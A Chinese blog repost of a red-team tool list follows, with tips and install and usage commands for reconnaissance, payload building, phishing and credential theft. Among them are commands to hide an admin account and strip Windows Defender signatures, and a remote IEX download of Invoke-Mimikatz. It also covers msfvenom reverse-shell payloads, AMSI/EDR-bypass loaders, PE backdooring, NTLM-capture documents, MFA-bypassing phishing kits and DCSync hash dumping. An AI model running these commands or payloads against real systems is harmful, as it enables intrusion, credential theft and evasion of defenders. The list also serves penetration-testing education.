统计
  • 建站日期:2021-03-10
  • 文章总数:114 篇
  • 评论总数:0 条
  • 分类总数:12 个
  • 最后更新:4月29日
文章 渗透测试

RedTeam Tools 红队渗透测试工具清单

自由子
首页 渗透测试 正文

目录导航

这个 github 存储库包含125 多种工具资源的集合,可用于红队活动(渗透测试)。

一些工具可能是专门为红队设计的,而其他工具则更通用,可以适应红队环境。

🔗如果您是蓝队成员(防守/溯源/取证),请查看BlueTeam-Tools

警告

此存储库中的材料仅供参考和教育目的。它们不打算用于任何非法活动。


RedTeamTools红队渗透测试工具清单
-纵横安全网-渗透测试-软件开发-前端开发-PHP全栈
-第1
张图片

工具清单

红队技巧-13 个技巧

侦察-20个工具

漏洞利用-8 种工具

初始访问-6个工具

执行-12种工具

持久性-4个工具

提权-9个工具

杀毒软件绕过-8个工具

凭据访问-11种工具

发现-6个工具

横向移动-12个工具

收集-3个工具

命令与控制(Command and Control -C2)-8个工具

渗出-5个工具

影响-3个工具

红队技巧

通过一系列红队技巧向红队队员学习。这些技巧涵盖了一系列提高红队能力的策略、工具和方法。

注意: 目前几乎所有提示都来自@Alh4zr3d,他发布了很好的红队技巧!

隐藏本地管理员帐户

reg add "HKLMSOFTWAREMicrosoftWindows NTCurrentVersionWinlogonSpecialAccountsUserList" /t REG_DWORD /v alh4zr3d /d 0 /f

描述: “逃避蓝队时创建帐户是有风险的,但在创建本地管理员时,请在注册表中使用一些可爱的魔法来隐藏它。”

信用: @Alh4zr3d

链接: 推特

通过删除签名来削弱 Windows Defender

"%Program Files%Windows DefenderMpCmdRun.exe" -RemoveDefinitions -All

描述: “有点乱,但如果 Windows Defender 让您很头疼,与其禁用它(提醒用户),不如通过删除所有签名来消除它。”

信用: @Alh4zr3d

链接: 推特

为每个用户启用多个 RDP 会话

reg add HKLMSystemCurrentControlSetControlTerminalServer /v fSingleSessionPerUser /d 0 /f

描述: ‘有时您想通过 RDP 或类似方式登录主机,但您的用户有一个活动会话。每个用户启用多个会话。

信用: @Alh4zr3d

链接: 推特

Sysinternals PsExec.exe 本地替代

wmic.exe /node:10.1.1.1 /user:username /password:pass process call create cmd.exe /c " command "

描述: ‘你厌倦了在横向移动时上传 Sysinternals PsExec.exe 吗?Windows 预装了更好的替代方案。试试这个。

信用: @GuhnooPlusLinux

链接: 推特

本地存活端口扫描仪

0..65535 | % {echo ((new-object Net.Sockets.TcpClient).Connect(,$_)) "Port $_ open"} 2>$null

描述: “如果可能的话,在本地上活动,而不是将工具上传到机器上(出于多种原因)。PowerShell/.NET 帮助。例如:Powershell 中的简单端口扫描器。

信用: @Alh4zr3d

链接: 推特

代理感知 PowerShell DownloadString

$w=(New-Object Net.WebClient);$w.Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;IEX $w.DownloadString("")

描述: “现在大多数大型组织都在使用网络代理。标准的 PowerShell 下载不支持代理。用这个。

信用: @Alh4zr3d

链接: 推特

在浏览器书签中寻找内部端点

type "C:Users%USERNAME%AppDataLocalGoogleChromeUser DataDefaultBookmarks.bak" | findstr /c "name url" | findstr /v "type"

描述: ‘你会惊讶于仅从用户的书签中就能找到什么。例如,他们可以访问的内部端点。

信用: @Alh4zr3d

链接: 推特

查询 DNS 记录以进行枚举

Get-DnsRecord -RecordType A -ZoneName FQDN -Server

描述: ‘枚举是游戏进程的 95%。但是,启动大量扫描以评估环境的动静非常大。为什么不向 DC/DNS 服务器询问所有 DNS 记录?

信用: @Alh4zr3d

链接: 推特

没有 PowerUp 的未引用服务路径

Get-CIMInstance -class Win32_Service -Property Name, DisplayName, PathName, StartMode | Where {$_.StartMode -eq "Auto" -and $_.PathName -notlike "C:Windows*" -and $_.PathName -notlike '"*'} | select PathName,DisplayName,Name

描述: ‘在没有 PowerUp 的情况下查找未引用的服务路径’

信用: @Alh4zr3d

链接: 推特

使用 /k 绕过禁用的命令提示符

# Win+R (To bring up Run Box) cmd.exe /k "whoami"

描述: “此命令提示符已被您的管理员禁用…”通常可以在kiosks PC 等环境中看到,快速解决方法是通过 Windows 运行框使用 /k。这将执行命令,然后显示限制消息,允许执行命令。

图片来源: Martin Sohn Christensen

链接: 博客

阻止 Windows Defender 删除 mimikatz.exe

(new-object net.webclient).downloadstring('https://raw.githubusercontent[.]com/BC-SECURITY/Empire/main/empire/server/data/module_source/credentials/Invoke-Mimikatz.ps1')|IEX;inv

描述: ‘你厌倦了 Windows Defender 删除 mimikatz.exe 吗?试试这个。

信用: @GuhnooPlusLinux

链接: 推特

检查你是否在虚拟机中

reg query HKLMSYSTEM /s | findstr /S "VirtualBox VBOX VMWare"

描述: ‘想知道您是否在虚拟机中吗?查询注册表项并找出!!!如果出现任何结果,那么您就在虚拟机中。

信用: @dmcxblue

链接: 推特

枚举 AppLocker 规则

(Get-AppLockerPolicy -Local).RuleCollections Get-ChildItem -Path HKLM:SoftwarePoliciesMicrosoftWindowsSrpV2 -Recurse

reg query HKEY_LOCAL_MACHINESoftwarePoliciesMicrosoftWindowsSrpV2Exe

描述: ‘AppLocker 可能会很痛苦。枚举看看有多痛’

信用: @Alh4zr3d

链接: 推特

侦察

crt.sh -> httpprobe -> EyeWitness

我整理了一个 bash 单行代码:

用法:

domain=DOMAIN_COM;rand=$RANDOM;curl -fsSL "https://crt.sh/?q=${domain}" | pup 'td text{}' | grep "${domain}" | sort -n | uniq | httprobe > /tmp/enum_tmp_${rand}.txt; python3 /usr/share/eyewitness/EyeWitness.py -f /tmp/enum_tmp_${rand}.txt --web

注意:您必须安装httprobepupEyeWitness并将“DOMAIN_COM”更改为目标域。如果您有多个目标根域,您可以在终端窗口中同时运行此脚本


RedTeamTools红队渗透测试工具清单
-纵横安全网-渗透测试-软件开发-前端开发-PHP全栈
-第2
张图片
RedTeamTools红队渗透测试工具清单
-纵横安全网-渗透测试-软件开发-前端开发-PHP全栈
-第3
张图片

js端点

用于提取页面上所有网页端点链接的 JavaScript 书签。

由@renniepak创建,此 JavaScript 代码片段可用于从当前网页 DOM 中提取所有端点(以 / 开头),包括网页上嵌入的所有外部脚本源。

javascript:(function(){var scripts=document.getElementsByTagName("script"),regex=/(?<=("|'|`))/[a-zA-Z0-9_?&=/-#.]*(?=("|'|`))/g;const results=new Set;for(var i=0;ilength;i++){var t=scripts[i].src;""!=t&&fetch(t).then(function(t){return t.text()}).then(function(t){var e=t.matchAll(regex);for(let r of e)results.add(r[0])}).catch(function(t){console.log("An error occurred: ",t)})}var pageContent=document.documentElement.outerHTML,matches=pageContent.matchAll(regex);for(const match of matches)results.add(match[0]);function writeResults(){results.forEach(function(t){document.write(t+"
")})}setTimeout(writeResults,3e3);})();

用法(书签)

创建一个书签…

  • Right click your bookmark bar
  • Click 'Add Page'
  • Paste the above Javascript in the 'url' box
  • Click 'Save'

…然后在浏览器中访问受害者页面并单击小书签。


RedTeamTools红队渗透测试工具清单
-纵横安全网-渗透测试-软件开发-前端开发-PHP全栈
-第4
张图片

用法(控制台)

将上面的 Javascript 粘贴到控制台窗口中F12,然后按回车键。


RedTeamTools红队渗透测试工具清单
-纵横安全网-渗透测试-软件开发-前端开发-PHP全栈
-第5
张图片

nuclei

使用 .yaml 模板搜索特定问题的快速漏洞扫描器。

安装:

go install -v github.com/projectdiscovery/nuclei/v2/cmd/nuclei@latest

用法:

cat domains.txt | nuclei -t /PATH/nuclei-templates/


RedTeamTools红队渗透测试工具清单
-纵横安全网-渗透测试-软件开发-前端开发-PHP全栈
-第6
张图片

certSniff –证书嗅探

certSniff 是我用 Python 编写的证书透明度日志关键字观察器。它使用 certstream 库来监视包含在文件中定义的关键字的证书创建日志。

你可以使用与你的受害者域相关的几个关键字来设置它运行,任何证书创建都将被记录下来,并可能导致发现你以前不知道的域。

安装:

git clone https://github.com/A-poc/certSniff;cd certSniff/;pip install -r requirements.txt

用法:

python3 certSniff.py -f example.txt


RedTeamTools红队渗透测试工具清单
-纵横安全网-渗透测试-软件开发-前端开发-PHP全栈
-第7
张图片

gobuster

用于暴力破解受害者网站上的文件/文件夹路径的好工具。

安装:

sudo apt install gobuster

用法:

gobuster dir -u "https://google.com" -w /usr/share/wordlists/dirb/big.txt --wildcard -b 301,401,403,404,500 -t 20


RedTeamTools红队渗透测试工具清单
-纵横安全网-渗透测试-软件开发-前端开发-PHP全栈
-第8
张图片

feroxbuster

一种旨在执行强制浏览的工具,这种攻击的目的是枚举和访问 Web 应用程序未引用但攻击者仍可访问的资源。

Feroxbuster 使用暴力结合词表来搜索目标目录中未链接的内容。这些资源可能存储有关 Web 应用程序和操作系统的敏感信息,例如源代码、凭据、内部网络寻址等…

安装:(kali)

sudo apt update && sudo apt install -y feroxbuster

安装:(Mac)

curl -sL https://raw.githubusercontent.com/epi052/feroxbuster/master/install-nix.sh | bash

安装:(windows)

Invoke-WebRequest https://github.com/epi052/feroxbuster/releases/latest/download/x86_64-windows-feroxbuster.exe.zip -OutFile feroxbuster.zip Expand-Archive .feroxbuster.zip .feroxbusterferoxbuster.exe -V

有关完整的安装说明,请参见此处

用法:

# Add .pdf, .js, .html, .php, .txt, .json, and .docx to each url ./feroxbuster -u http://127.1 -x pdf -x js,html -x php txt json,docx # Scan with headers ./feroxbuster -u http://127.1 -H Accept:application/json "Authorization: Bearer {token}" # Read URLs from stdin cat targets | ./feroxbuster --stdin --silent -s 200 301 302 --redirects -x js | fff -s 200 -o js-files # Proxy requests through burpsuite ./feroxbuster -u http://127.1 --insecure --proxy http://127.0.0.1:8080

可以在此处找到完整的用法示例。


RedTeamTools红队渗透测试工具清单
-纵横安全网-渗透测试-软件开发-前端开发-PHP全栈
-第9
张图片

图片来自
epi052/feroxbuster/main/img/demo.gif

CloudBrute

在顶级云提供商(亚马逊、谷歌、微软、DigitalOcean、阿里巴巴、Vultr、Linode)上查找公司(目标)基础设施、文件和应用程序的工具。

特征:

  • 云检测(IPINFO API 和源代码)
  • 快速(并发)
  • 跨平台(windows、linux、mac)
  • 用户代理随机化
  • 代理随机化(HTTP、Socks5)

安装:

下载适用于您系统的最新版本并按照使用说明操作。

用法:

# Specified target, generate keywords based off 'target', 80 threads with a timeout of 10, wordlist 'storage_small.txt' CloudBrute -d target.com -k target -m storage -t 80 -T 10 -w "./data/storage_small.txt" # Output results to file CloudBrute -d target.com -k keyword -m storage -t 80 -T 10 -w -c amazon -o target_output.txt


RedTeamTools红队渗透测试工具清单
-纵横安全网-渗透测试-软件开发-前端开发-PHP全栈
-第10
张图片

图片来自https://github.com/0xsha/CloudBrute

dnsrecon-域名侦察

dnsrecon 是一个用于枚举 DNS 记录(MX、SOA、NS、A、AAAA、SPF 和 TXT)的 pyhton 工具,并且可以提供许多新的关联受害者主机以从单个域搜索中转向。

安装:

sudo apt install dnsrecon

用法:

dnsrecon -d google.com


RedTeamTools红队渗透测试工具清单
-纵横安全网-渗透测试-软件开发-前端开发-PHP全栈
-第11
张图片

shodan.io

Shodan 爬取公共基础设施并以可搜索的格式显示它。使用公司名称、域名、IP 地址,可以通过 shodan 发现与您的目标相关的潜在易受攻击的系统。


RedTeamTools红队渗透测试工具清单
-纵横安全网-渗透测试-软件开发-前端开发-PHP全栈
-第12
张图片

AORT

用于枚举子域、枚举 DNS、WAF 检测、WHOIS、端口扫描、回溯机(wayback machine)、电子邮件收集的工具。

安装:

git clone https://github.com/D3Ext/AORT; cd AORT; pip3 install -r requirements.txt

用法:

python3 AORT.py -d google.com


RedTeamTools红队渗透测试工具清单
-纵横安全网-渗透测试-软件开发-前端开发-PHP全栈
-第13
张图片

spoofcheck

检查域是否可以被欺骗的程序。该程序检查 SPF 和 DMARC 记录是否存在允许欺骗的弱配置。此外,如果域具有 DMARC 配置,在失败的 SPF/DKIM 电子邮件上发送邮件或 HTTP 请求,它会发出警报。

如果满足以下任何条件,则域是可欺骗的:

  • 缺少 SPF 或 DMARC 记录
  • SPF 记录从不指定~all或-all
  • DMARC 政策设置为p=none或不存在

安装:

git clone https://github.com/BishopFox/spoofcheck; cd spoofcheck; pip install -r requirements.txt

用法:

./spoofcheck.py [DOMAIN]


RedTeamTools红队渗透测试工具清单
-纵横安全网-渗透测试-软件开发-前端开发-PHP全栈
-第14
张图片

AWSBucketDump

AWSBucketDump 是一种快速枚举 AWS S3 存储桶以查找感兴趣文件的工具。它类似于子域暴力破解器,但专为 S3 存储桶而设计,并且还有一些额外的功能,允许您对文件进行 grep,以及下载有趣的文件。

安装:

git clone https://github.com/jordanpotti/AWSBucketDump; cd AWSBucketDump; pip install -r requirements.txt

用法:

usage: AWSBucketDump.py [-h] [-D] [-t THREADS] -l HOSTLIST [-g GREPWORDS] [-m MAXSIZE] optional arguments:
  -h, --help    show this help message and exit -D            Download files. This requires significant diskspace
  -d If set to 1 or True, create directories for each host w/ results
  -t THREADS    number of threads
  -l HOSTLIST
  -g GREPWORDS  Provide a wordlist to grep for -m MAXSIZE    Maximum file size to download.

 python AWSBucketDump.py -l BucketNames.txt -g interesting_Keywords.txt -D -m 500000 -d 1 

GitHarvesterGit 收割机

使用正则表达式从 GitHub 查找信息的好工具,能够搜索特定的 GitHub 用户和/或项目。

安装:

git clone https://github.com/metac0rtex/GitHarvester; cd GitHarvester

用法:

./githarvester.py

truffleHog

TruffleHog 是一种扫描 git 存储库并查找高熵字符串和模式的工具,这些字符串和模式可能表明存在秘密,例如密码和 API 密钥。使用 TruffleHog,您可以快速轻松地找到可能被意外提交并推送到存储库的敏感信息。

安装(二进制文件): 链接

安装(go):

git clone https://github.com/trufflesecurity/trufflehog.git; cd trufflehog; go install

用法:

trufflehog https://github.com/trufflesecurity/test_keys


RedTeamTools红队渗透测试工具清单
-纵横安全网-渗透测试-软件开发-前端开发-PHP全栈
-第15
张图片

Dismap

Dismap 是一种资产发现和识别工具。可以快速识别web/tcp/udp等协议和指纹信息,定位资产类型,适用于内外网。

Dismap拥有完备的指纹规则库,目前包括tcp/udp/tls协议指纹和4500+条web指纹规则,可以识别favicon、body、header等。

安装:

Dismap 是适用于 Linux、MacOS 和 Windows 的二进制文件。去Release下载对应的版本运行:

# Linux or MacOS chmod +x dismap-0.3-linux-amd64
./dismap-0.3-linux-amd64 -h # Windows dismap-0.3-windows-amd64.exe -h

用法:

# Scan 192.168.1.1 subnet ./dismap -i 192.168.1.1/24 # Scan, output to result.txt and json output to result.json ./dismap -i 192.168.1.1/24 -o result.txt -j result.json # Scan, Not use ICMP/PING to detect surviving hosts, timeout 10 seconds ./dismap -i 192.168.1.1/24 --np --timeout 10 # Scan, Number of concurrent threads 1000 ./dismap -i 192.168.1.1/24 -t 1000


RedTeamTools红队渗透测试工具清单
-纵横安全网-渗透测试-软件开发-前端开发-PHP全栈
-第16
张图片

图片使用自https://github.com/zhzyker/dismap

enum4linux

用于从 Windows 和 Samba 系统枚举信息的工具。

它可用于收集范围广泛的信息,包括:

  • 域和域控制器信息
  • 本地用户和组信息
  • 共享和共享权限
  • 安全政策
  • 活动目录信息

安装:(Apt

sudo apt install enum4linux

安装:(Git)

git clone https://github.com/CiscoCXSecurity/enum4linux cd enum4linux

用法:

# 'Do everything' enum4linux.pl -a 192.168.2.55 # Obtain list of usernames (RestrictAnonymous = 0) enum4linux.pl -U 192.168.2.55 # Obtain list of usernames (using authentication) enum4linux.pl -u administrator -p password -U 192.168.2.55 # Get a list of groups and their members enum4linux.pl -G 192.168.2.55 # Verbose scan  enum4linux.pl -v 192.168.2.55

完整的使用信息可以在这个博客中找到。


RedTeamTools红队渗透测试工具清单
-纵横安全网-渗透测试-软件开发-前端开发-PHP全栈
-第17
张图片

图片来自https://allabouttesting.org/samba-enumeration-for-penetration-testing-short-tutorial/

skanuvaty

危险的快速 dns/网络/端口扫描器,由Esc4iCEscEsc创建,用 Rust 编写。

您将需要一个子域文件。例如Sublist3r 的子域词表

安装:

从这里下载最新版本。

# Install a wordlist sudo apt install wordlists ls /usr/share/dirb/wordlists ls /usr/share/amass/wordlists

用法:

skanuvaty --target example.com --concurrency 16 --subdomains-file SUBDOMAIN_WORDLIST.txt


RedTeamTools红队渗透测试工具清单
-纵横安全网-渗透测试-软件开发-前端开发-PHP全栈
-第18
张图片

图片来自https://github.com/Esc4iCEscEsc/skanuvaty

Metabigor

Metabigor 是一种智能工具,它的目标是执行 OSINT 任务等,但没有任何 API 密钥。

主要特点:

  • 搜索有关 IP 地址、ASN 和组织的信息。
  • 用于在 IP/CIDR 上更高效地运行 rustscan、masscan 和 nmap 的包装器。
  • 通过应用各种技术(证书、whois、Google Analytics 等)查找目标的更多相关域。
  • 获取有关 IP 地址的摘要(由@thebl4ckturtle提供支持)

安装:

go install github.com/j3ssie/metabigor@latest

用法:

# discovery IP of a company/organization echo "company" | metabigor net --org -o /tmp/result.txt # Getting more related domains by searching for certificate info echo 'Target Inc' | metabigor cert --json | jq -r '.Domain' | unfurl format %r.%t | sort -u # this is old command # Only run rustscan with full ports echo '1.2.3.4/24' | metabigor scan -o result.txt # Reverse Whois to find related domains echo 'example.com' | metabigor related -s 'whois' # Get Google Analytics ID directly from the URL echo 'https://example.com' | metabigor related -s 'google-analytic'


RedTeamTools红队渗透测试工具清单
-纵横安全网-渗透测试-软件开发-前端开发-PHP全栈
-第19
张图片

图片来自https://github.com/j3ssie/metabigor

Gitrob

Gitrob 是一种工具,可帮助查找推送到 Github 上公共存储库的潜在敏感文件。

Gitrob 会将属于用户或组织的存储库克隆到可配置的深度,并遍历提交历史记录并标记与潜在敏感文件的签名匹配的文件。

调查结果将通过网络界面呈现,以便于浏览和分析。

注意: Gitrob 需要 Github 访问令牌才能与 Github API 交互。创建个人访问令牌并将其保存在 .bashrc 或类似的 shell 配置文件中的环境变量中:

export GITROB_ACCESS_TOKEN=deadbeefdeadbeefdeadbeefdeadbeefdeadbeef

安装:(go)

go get github.com/michenriksen/gitrob

安装:(二进制)

每个版本都有一个预编译版本。

用法:

# Run against org gitrob {org_name} # Saving session to a file gitrob -save ~/gitrob-session.json acmecorp # Loading session from a file gitrob -load ~/gitrob-session.json


RedTeamTools红队渗透测试工具清单
-纵横安全网-渗透测试-软件开发-前端开发-PHP全栈
-第20
张图片

图片来自https://www.uedbox.com/post/58828/

Gowitness

Gowitness 是一个用 Golang 编写的网站截图实用程序,它使用 Chrome Headless 使用命令行生成 Web 界面的屏幕截图,并带有一个方便的报告查看器来处理结果。支持 Linux 和 macOS,主要支持 Windows。

安装:(go)

go install github.com/sensepost/gowitness@latest

完整的安装信息可以在这里找到。

用法:

# Screenshot a single website gowitness single https://www.google.com/ # Screenshot a cidr using 20 threads gowitness scan --cidr 192.168.0.0/24 --threads 20 # Screenshot open http services from an namp file gowitness nmap -f nmap.xml --open --service-contains http # Run the report server gowitness report serve

完整的使用信息可以在这里找到。


RedTeamTools红队渗透测试工具清单
-纵横安全网-渗透测试-软件开发-前端开发-PHP全栈
-第21
张图片

图片来自https://github.com/sensepost/gowitness

资源开发

Chimera

Chimera 是一种 PowerShell 混淆脚本,旨在绕过 AMSI 和防病毒解决方案。它消化已知会触发 AV 的恶意 PS1,并使用字符串替换和变量连接来逃避常见的检测签名。

安装:

sudo apt-get update && sudo apt-get install -Vy sed xxd libc-bin curl jq perl gawk grep coreutils git
sudo git clone https://github.com/tokyoneon/chimera /opt/chimera
sudo chown $USER:$USER -R /opt/chimera/; cd /opt/chimera/
sudo chmod +x chimera.sh; ./chimera.sh --help

用法:

./chimera.sh -f shells/Invoke-PowerShellTcp.ps1 -l 3 -o /tmp/chimera.ps1 -v -t powershell,windows,
copyright -c -i -h -s length,get-location,ascii,stop,close,getstream -b new-object,reverse,
invoke-expression,out-string,write-error -j -g -k -r -p


RedTeamTools红队渗透测试工具清单
-纵横安全网-渗透测试-软件开发-前端开发-PHP全栈
-第22
张图片

msfvenom

Msfvenom 允许以多种格式为各种操作系统创建有效负载。它还支持对 AV 绕过的有效负载进行混淆。

设置监听器

use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LHOST your-ip set LPORT listening-port 
run

Msfvenom 命令

PHP:

msfvenom -p php/meterpreter/reverse_tcp lhost =192.168.0.9 lport=1234 R

windows

msfvenom -p windows/shell/reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x86.exe

Linux:

msfvenom -p linux/x86/shell/reverse_tcp LHOST=LPORT=-f elf > shell-x86.elf

java:

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f raw > shell.jsp

HTA

msfvenom -p windows/shell_reverse_tcp lhost=192.168.1.3 lport=443 -f hta-psh > shell.hta


RedTeamTools红队渗透测试工具清单
-纵横安全网-渗透测试-软件开发-前端开发-PHP全栈
-第23
张图片

Shellter

Shellter 是一个动态 shellcode 注入工具,也是有史以来第一个真正动态的 PE 感染器。

它可用于将 shellcode 注入本机 Windows 应用程序(目前仅限 32 位应用程序)。

Shellter 利用了 PE 文件的原始结构并且不应用任何修改,例如更改部分的内存访问权限(除非用户想要),添加一个具有 RWE 访问权限的额外部分,以及任何在 AV 扫描下看起来不可靠的部分.

可以在此处找到完整的 README 信息。

安装:(kali)

apt-get update apt-get install shellter

安装:(windows)

访问下载页面并安装。

用法:

只需选择一个合法的二进制文件作为后门并运行 Shellter。

可以在此处找到一些不错的提示。

可以在此处找到大量社区使用演示。


RedTeamTools红队渗透测试工具清单
-纵横安全网-渗透测试-软件开发-前端开发-PHP全栈
-第24
张图片

图片来自
kali.org/tools/shellter/images/shellter.png

Freeze

Freeze 是一种有效载荷创建工具,用于绕过 EDR 安全控制以隐秘方式执行 shellcode。

Freeze 利用多种技术,不仅可以删除 Userland EDR 挂钩,还可以以绕过其他端点监控控制的方式执行 shellcode。

安装:

git clone https://github.com/optiv/Freeze cd Freeze
go build Freeze.go

用法:

-I string Path to the raw 64-bit shellcode.
  -O string Name of output file (e.g. loader.exe or loader.dll). Depending on what file extension defined will determine if Freeze makes a dll or exe.
  -console
        Only for Binary Payloads - Generates verbose console information when the payload is executed. This will disable the hidden window feature.
  -encrypt
        Encrypts the shellcode using AES 256 encryption
  -export string For DLL Loaders Only - Specify a specific Export function for a loader to have.
  -process string The name of process to spawn. This process has to exist in C:WindowsSystem32. Example 'notepad.exe' (default "notepad.exe") -sandbox
        Enables sandbox evasion by checking: Is Endpoint joined to a domain?
                Does the Endpoint have more than 2 CPUs?
                Does the Endpoint have more than 4 gigs of RAM?
  -sha256
        Provides the SHA256 value of the loaders (This is useful for tracking)


RedTeamTools红队渗透测试工具清单
-纵横安全网-渗透测试-软件开发-前端开发-PHP全栈
-第25
张图片

图片来自
blackhatethicalhacking.com/tools/freeze/

WordSteal

该脚本将创建一个带有远程图像的 Microsoft Word 文档,允许从远程受害者端点捕获 NTML 哈希。

Microsoft Word 能够包含来自远程位置的图像,包括托管在攻击者控制的 SMB 服务器上的远程图像。这使您有机会侦听和捕获经过身份验证的受害者打开 Word 文档并呈现图像时发送的 NTLM 哈希。

安装:

git clone https://github.com/0x09AL/WordSteal cd WordSteal

用法:

# Generate document containing 'test.jpg' and start listener ./main.py 127.0.0.1 test.jpg 1 # Generate document containing 'test.jpg' and do not start listener ./main.py 127.0.0.1 test.jpg 0n


RedTeamTools红队渗透测试工具清单
-纵横安全网-渗透测试-软件开发-前端开发-PHP全栈
-第26
张图片

图片来自https://pentestit.com/wordsteal-steal-ntlm-hashes-remotely/

WSH

创建有效载荷:

Set shell = WScript.CreateObject("Wscript.Shell")
shell.Run("C:WindowsSystem32calc.exe " & WScript.ScriptFullName),0,True

执行:

wscript payload.vbs
cscript.exe payload.vbs
wscript /e:VBScript payload.txt //If .vbs files are blacklisted

HTA

创建有效载荷:

<html> <body> <script> var c= 'cmd.exe' new ActiveXObject('WScript.Shell').Run(c); script> body> html>

执行:运行文件

VBA

创建有效载荷:

Sub calc() Dim payload As String payload = "calc.exe" CreateObject("Wscript.Shell").Run payload,0 End Sub

执行:在启用宏的文档中将函数设置为 Auto_Open()

初始访问

Bash Bunny

Bash Bunny 是一种物理 USB 攻击工具和多功能有效负载传送系统。它设计用于插入计算机的 USB 端口,并且可以通过编程来执行各种功能,包括操纵和泄露数据、安装恶意软件以及绕过安全措施。

hackinglab:Bash Bunny – 指南

Hak5 文档

不错的有效载荷回购

产品页面


RedTeamTools红队渗透测试工具清单
-纵横安全网-渗透测试-软件开发-前端开发-PHP全栈
-第27
张图片

EvilGoPhish

evilginx2 + gophish。(GoPhish) Gophish 是一个功能强大的开源网络钓鱼框架,可以轻松测试您的组织是否受到网络钓鱼攻击。(evilginx2) 独立的中间人攻击框架,用于钓鱼登录凭据和会话 cookie,允许绕过 2 因素身份验证

安装:

git clone https://github.com/fin3ss3g0d/evilgophish

用法:

Usage:
./setup bool>bool>bool>
 - root domain                     - the root domain to be used for the campaign
 - subdomains                      - a space separated list of evilginx2 subdomains, can be one if only one
 - root domain bool - true or false to proxy root domain to evilginx2
 - redirect url                    - URL to redirect unauthorized Apache requests
 - feed bool - true or false if you plan to use the live feed
 - rid replacement                 - replace the gophish default "rid" in phishing URLs with this value - blacklist bool - true or false to use Apache blacklist
Example:
  ./setup.sh example.com "accounts myaccount" false https://redirect.com/ true user_id false


RedTeamTools红队渗透测试工具清单
-纵横安全网-渗透测试-软件开发-前端开发-PHP全栈
-第28
张图片

社会工程师工具包 (SET)Social Engineer Toolkit

该框架非常适合为初始访问创建活动,“SET 具有许多自定义攻击向量,可让您快速进行可信的攻击”。

安装:

git clone https://github.com/IO1337/social-engineering-toolkit; cd set; python setup.py install

用法:

python3 setoolkit


RedTeamTools红队渗透测试工具清单
-纵横安全网-渗透测试-软件开发-前端开发-PHP全栈
-第29
张图片

Hydra

登录暴力攻击的好工具。可以提供多种服务,包括 SSH、FTP、TELNET、HTTP 等。

安装:

sudo apt install hydra

用法:

hydra -L USER.TXT -P PASS.TXT 1.1.1.1 http-post-form "login.php:username-^USER^&password=^PASS^:Error" hydra -L USER.TXT -P PASS.TXT 1.1.1.1 ssh


RedTeamTools红队渗透测试工具清单
-纵横安全网-渗透测试-软件开发-前端开发-PHP全栈
-第30
张图片

SquarePhish

SquarePhish 是一种高级网络钓鱼工具,它使用结合 OAuth 设备代码身份验证流程和 QR 码的技术(有关用于网络钓鱼攻击的 OAuth 设备代码流程的更多信息,请参阅PhishInSuits )。

攻击步骤:

  • 向受害者发送恶意二维码
  • 受害人用手机扫描二维码
  • 受害者定向到攻击者控制的服务器(触发 OAuth 设备代码身份验证流程)
  • 受害者通过电子邮件发送 MFA 代码(触发 OAuth 设备代码流程 15 分钟计时器)
  • 攻击者轮询身份验证
  • 受害者将代码输入合法的微软网站
  • 攻击者保存身份验证令牌

安装:

git clone https://github.com/secureworks/squarephish; cd squarephish; pip install -r requirements.txt

注意: 在使用任一模块之前,请更新 settings.config 文件中标有 的所需信息Required。

用法(电子邮件模块):

usage: squish.py email [-h] [-c CONFIG] [--debug] [-e EMAIL] optional arguments:
  -h, --help            show this help message and exit -c CONFIG, --config CONFIG squarephish config file [Default: settings.config] --debug               enable server debugging -e EMAIL, --email EMAIL victim email address to send initial QR code email to

用法(服务器模块):

usage: squish.py server [-h] [-c CONFIG] [--debug] optional arguments:
  -h, --help            show this help message and exit -c CONFIG, --config CONFIG squarephish config file [Default: settings.config] --debug               enable server debugging


RedTeamTools红队渗透测试工具清单
-纵横安全网-渗透测试-软件开发-前端开发-PHP全栈
-第31
张图片

King Phisher

King Phisher 是一种工具,允许攻击者创建并向受害者发送网络钓鱼电子邮件以获取敏感信息。

它包括可自定义模板、活动管理和电子邮件发送功能等功能,使其成为执行网络钓鱼攻击的强大且易于使用的工具。借助 King Phisher,攻击者可以向个人或组织发送有针对性且令人信服的网络钓鱼电子邮件,从而增加攻击成功的机会。

安装(Linux – 客户端和服务器):

wget -q https://github.com/securestate/king-phisher/raw/master/tools/install.sh && 
sudo bash ./install.sh

用法:

安装 King Phisher 后,请按照wiki 页面设置 SSH、数据库配置、SMTP 服务器等。


RedTeamTools红队渗透测试工具清单
-纵横安全网-渗透测试-软件开发-前端开发-PHP全栈
-第32
张图片

执行

Responder

Responder 是一种用于在网络上中毒 LLMNR 和 NBT-NS 协议的工具,以允许凭据捕获和任意代码执行。

Windows 系统使用 LLMNR(链路本地多播名称解析)和 NBT-NS(NetBIOS 名称服务)协议将主机名解析为本地网络上的 IP 地址。如果使用这些协议无法解析主机名,系统将向本地网络广播主机名请求。

Responder 侦听这些广播并使用伪造的 IP 地址进行响应,从而诱使请求系统将其凭据发送给攻击者。

安装:

git clone https://github.com/SpiderLabs/Responder#usage cd Responder

用法:

# Running the tool ./Responder.py [options] # Typical usage ./Responder.py -I eth0 -wrf

完整的使用信息可以在这里找到。


RedTeamTools红队渗透测试工具清单
-纵横安全网-渗透测试-软件开发-前端开发-PHP全栈
-第33
张图片

图片来自https://www.4armed.com/blog/llmnr-nbtns-poisoning-using-responder/

secretsdump

作为 Impacket 库的一部分的实用程序,可用于从 Windows 系统中提取密码哈希和其他秘密。

它通过与系统上的安全帐户管理器 (SAM) 数据库交互并提取散列密码和其他信息来实现此目的,例如:

  • 本地帐户的密码哈希
  • Kerberos 票据和密钥
  • LSA 秘密

安装:

python3 -m pip install impacket

用法:

# Extract NTLM hashes with local files secretsdump.py -ntds /root/ntds_cracking/ntds.dit -system /root/ntds_cracking/systemhive LOCAL # DCSync attack and dump the NTLM hashes of all domain users. secretsdump.py -dc-ip 10.10.10.30 MEGACORP.LOCAL/svc_bes:Sheffield19@10.10.10.30


RedTeamTools红队渗透测试工具清单
-纵横安全网-渗透测试-软件开发-前端开发-PHP全栈
-第34
张图片

图片来自https://riccardoancarani.github.io/2020-05-10-hunting-for-impacket/#secretsdumppy

evil-winrm

Evil-WinRM 是一个为 Windows 远程管理提供命令行界面的工具(WinRM:一种允许管理员在 Windows 机器上远程执行命令的服务)。

